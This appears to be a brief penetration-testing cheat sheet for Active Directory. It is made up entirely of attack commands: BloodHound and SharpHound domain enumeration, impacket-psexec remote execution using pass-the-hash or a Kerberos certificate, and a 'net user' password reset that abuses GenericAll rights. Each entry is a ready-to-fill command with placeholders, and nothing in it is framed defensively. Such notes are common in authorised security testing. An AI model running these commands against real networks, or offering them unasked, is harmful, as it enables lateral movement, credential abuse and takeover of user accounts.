Bloodhound

bloodhound-ce-python -u '[email protected]' --hashes ':ntlm-hash-here' -d 'DOMAIN.COM' -ns TARGET_IP --dns-tcp -c All --zip

Impacket

Impacket-psexec

With certificate

impacket-psexec -k -no-pass -target-ip DC_IP -dc-ip DC_IP USERNAME@FQDN

With hashes

impacket-psexec 'TARGET_FQDN/Administrator@TARGET_IP' -hashes :'YOUR_NTLM_HASH'

Sharphound

Without credentials

.\\SharpHound.exe -c ALL -s --recursedomains

With credentials

 .\\sharphound.exe -c All --domain dev.DOMAIN.com --ldapusername username --ldappassword 'Password123!'

Generic write on user

• You can reset a user’s password if you have GenericAll on a user

net user TARGET_USER Password123 /domain